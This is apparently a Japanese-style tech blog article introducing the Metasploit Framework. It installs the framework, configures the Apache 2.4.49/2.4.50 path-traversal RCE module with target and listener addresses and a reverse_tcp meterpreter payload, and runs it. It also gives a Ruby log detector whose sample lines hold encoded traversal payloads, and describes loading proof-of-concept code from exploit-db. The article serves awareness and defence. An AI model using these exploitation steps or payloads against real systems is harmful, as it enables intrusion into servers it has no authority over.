[Introduction] Metasploit Framework [For penetration testing]
Hello.
I am an infrastructure manager in the system solution department.
There is a well-known piece of open source software called the Metasploit Framework.
It is a tool for "penetration testing", which evaluates how well a system's security holds up by actually exploiting vulnerabilities in middleware and other software.
This time, I would like to set up an environment in which this tool can be used.
Looking at a tool like this gives you a real sense of how dangerous it is to keep running versions with known vulnerabilities, so the purpose of this article is to make you aware of that.
*Although it is a penetration-testing tool, please be sure to use it only in a verification environment you have prepared yourself.
Abuse is a crime, so please use it at your own risk.
Metasploit Framework installation
As usual, I prepared the environment with a CentOS 7 Bento box.
Let's install the tool according to the documentation.
[root@localhost ~]# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
[root@localhost ~]# chmod 755 msfinstall
[root@localhost ~]# ./msfinstall
After installation, you can start it with the following command.
When I ran it, an interactive shell was displayed.
[root@localhost ~]# /opt/metasploit-framework/bin/msfconsole
(omitted)
msf6 >
It was easy.
Trying it out
You can use the search command to see the exploit modules already included in the tool.
First, let's look for modules that target Apache.
msf6 > search httpd

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/linux/http/alcatel_omnipcx_mastercgi_exec    2007-09-09       manual     No     Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
   1  exploit/multi/http/apache_normalize_path_rce         2021-05-10       excellent  Yes    Apache 2.4.49/2.4.50 Traversal RCE
   2  auxiliary/scanner/http/apache_normalize_path         2021-05-10       normal     No     Apache 2.4.49/2.4.50 Traversal RCE scanner
   3  auxiliary/scanner/http/mod_negotiation_brute                          normal     No     Apache HTTPD mod_negotiation Filename Bruter
   4  auxiliary/scanner/http/mod_negotiation_scanner                        normal     No     Apache HTTPD mod_negotiation Scanner
   5  exploit/windows/http/apache_chunked                  2002-06-19       good       Yes    Apache Win32 Chunked Encoding
   6  exploit/linux/http/dlink_dspw110_cookie_noauth_exec  2015-06-12       normal     Yes    D-Link Cookie Command Execution
   (omitted)
More than 20 modules were listed.
Let's take "exploit/multi/http/apache_normalize_path_rce", which appears near the top, as our subject.
This module targets a path traversal flaw in Apache 2.4.49/2.4.50 that allows remote command execution if files outside the document root are not protected by "require all denied" and CGI is explicitly enabled.
Select the module with the use command.
msf6 > use exploit/multi/http/apache_normalize_path_rce
# If the prompt looks like this, it worked
msf6 exploit(multi/http/apache_normalize_path_rce) >
The options you need to enter differ from module to module, so check them with the show options command.
Let's see it in action.
msf6 exploit(multi/http/apache_normalize_path_rce) > show options

Module options (exploit/multi/http/apache_normalize_path_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CVE        CVE-2021-42013   yes       The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013)
   DEPTH      5                yes       Depth for Path Traversal
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cgi-bin         yes       Base path
   VHOST                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Dropper)
Items whose Required field is "yes" must be given a value.
Among them, "RHOSTS" (the target IP) and "LHOST" (the attacker's listening IP) are required but left blank (the others have default values).
These two must be filled in manually.
# The IP addresses are arbitrary examples.
msf6 exploit(multi/http/apache_normalize_path_rce) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
All that's left to do is run it.
msf6 exploit(multi/http/apache_normalize_path_rce) > exploit
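Seen from the defender's side, the path normalization flaw this module targets leaves a recognizable trace in the web server's access log: a ".." segment that is only visible after percent-decoding (".%2e", or double-encoded ".%%32%65" for the incomplete first fix) and that climbs above the document root. The following Ruby script is an added example written for this article; it is not part of the original post and not Metasploit code. It runs a small detector over constructed Apache access-log lines (made-up IPs, timestamps and paths), decoding repeatedly, walking the path segments and reporting requests whose decoded path escapes "/" or whose ".." segments appear only after decoding. The `a..b.png` line shows why a substring match on ".." is not enough.

```ruby
# Added example (not from the original article or from Metasploit): a
# defender-side scan of Apache access-log lines for the request pattern
# behind the Apache 2.4.49/2.4.50 path normalization flaw
# (CVE-2021-41773 / CVE-2021-42013).

# Constructed sample lines in Apache combined log format. IPs, timestamps
# and paths are made up for this example.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [06/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024
  10.0.0.9 - - [06/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hostname HTTP/1.1" 200 3120
  10.0.0.9 - - [06/Oct/2021:10:00:03 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/hostname HTTP/1.1" 200 3120
  10.0.0.7 - - [06/Oct/2021:10:00:04 +0000] "GET /images/a..b.png?v=2 HTTP/1.1" 200 900
LOG

# Request line of a combined-format access log entry.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+" (?<status>\d{3})/

# One round of percent-decoding on a binary string. Only valid %XX pairs are
# decoded, so the bare "%" in "%%32%65" is left for the next round.
def percent_decode_once(str)
  str.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr(Encoding::BINARY) }
end

# Decode until the string stops changing (bounded) and return the result
# plus the number of rounds that changed it; two or more means double encoding.
def fully_decode(path, max_rounds: 3)
  current = path.b
  rounds = 0
  max_rounds.times do
    decoded = percent_decode_once(current)
    break if decoded == current
    current = decoded
    rounds += 1
  end
  [current, rounds]
end

# Walk the segments of a decoded path; true if a ".." ever climbs above "/".
def escapes_root?(decoded_path)
  depth = 0
  decoded_path.split('/').each do |segment|
    next if segment.empty? || segment == '.'
    if segment == '..'
      depth -= 1
      return true if depth < 0
    else
      depth += 1
    end
  end
  false
end

# Analyse one request target (path plus optional query string).
def analyze_request_path(target)
  raw_path = target.split('?', 2).first
  decoded, rounds = fully_decode(raw_path)
  # ".." segments that exist only after decoding are the normalization
  # bypass; a literal "../" would have been collapsed by the server itself.
  hidden_dotdot = decoded.split('/').count('..') > raw_path.split('/').count('..')
  escapes = escapes_root?(decoded)
  {
    raw_path: raw_path,
    decoded_path: decoded,
    decode_rounds: rounds,
    hidden_dotdot: hidden_dotdot,
    escapes_root: escapes,
    suspicious: hidden_dotdot || escapes,
  }
end

# Return a finding for every log line whose request looks like traversal.
def scan_log(text)
  text.each_line.map do |line|
    m = LOG_LINE.match(line)
    next unless m
    finding = analyze_request_path(m[:target])
    next unless finding[:suspicious]
    finding.merge(ip: m[:ip], method: m[:method], status: m[:status].to_i)
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |f|
    puts "#{f[:ip]} #{f[:method]} #{f[:raw_path]} -> #{f[:decoded_path]} " \
         "(decode rounds: #{f[:decode_rounds]}, status #{f[:status]})"
  end
end
```

Run it against a real access log by replacing SAMPLE_LOG with the file's contents. A hit with status 200 on a decoded path outside the document root is what a successful traversal looks like from the server side; the same request against a patched 2.4.51+ server, or against a server whose filesystem root carries "require all denied", is rejected before the file is served.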
Fetching exploit code from outside and running it
Attack code for a vulnerability is often made public for demonstration purposes (this is called a PoC, a proof of concept).
By using it, you can therefore test a vulnerability right away.
This time, I will pull from the following site provided by Offensive Security, the company well known for Kali Linux.
https://www.exploit-db.com/
You can obtain the PoC code by clicking the download button on the relevant page.
Copy the downloaded code into Metasploit's modules/exploits directory.
In my environment, the path was as follows:
/opt/metasploit-framework/embedded/framework/modules/exploits
Once the file is in place, the modules need to be reloaded.
[root@localhost exploits]# /opt/metasploit-framework/bin/msfconsole
msf6 > reload_all
Since Metasploit itself is written in Ruby, I assumed a module would have to be in Ruby as well, but it seems Python or Go also work.
Summary
So, do you see how dangerous this is?
Just like with patents, the details have to be made public for a vulnerability to be acknowledged, which means malicious people can easily test for it as well.
That is why it is dangerous to keep using older versions of software.
It goes without saying, but be sure to update regularly.
(It was an awareness campaign. End.)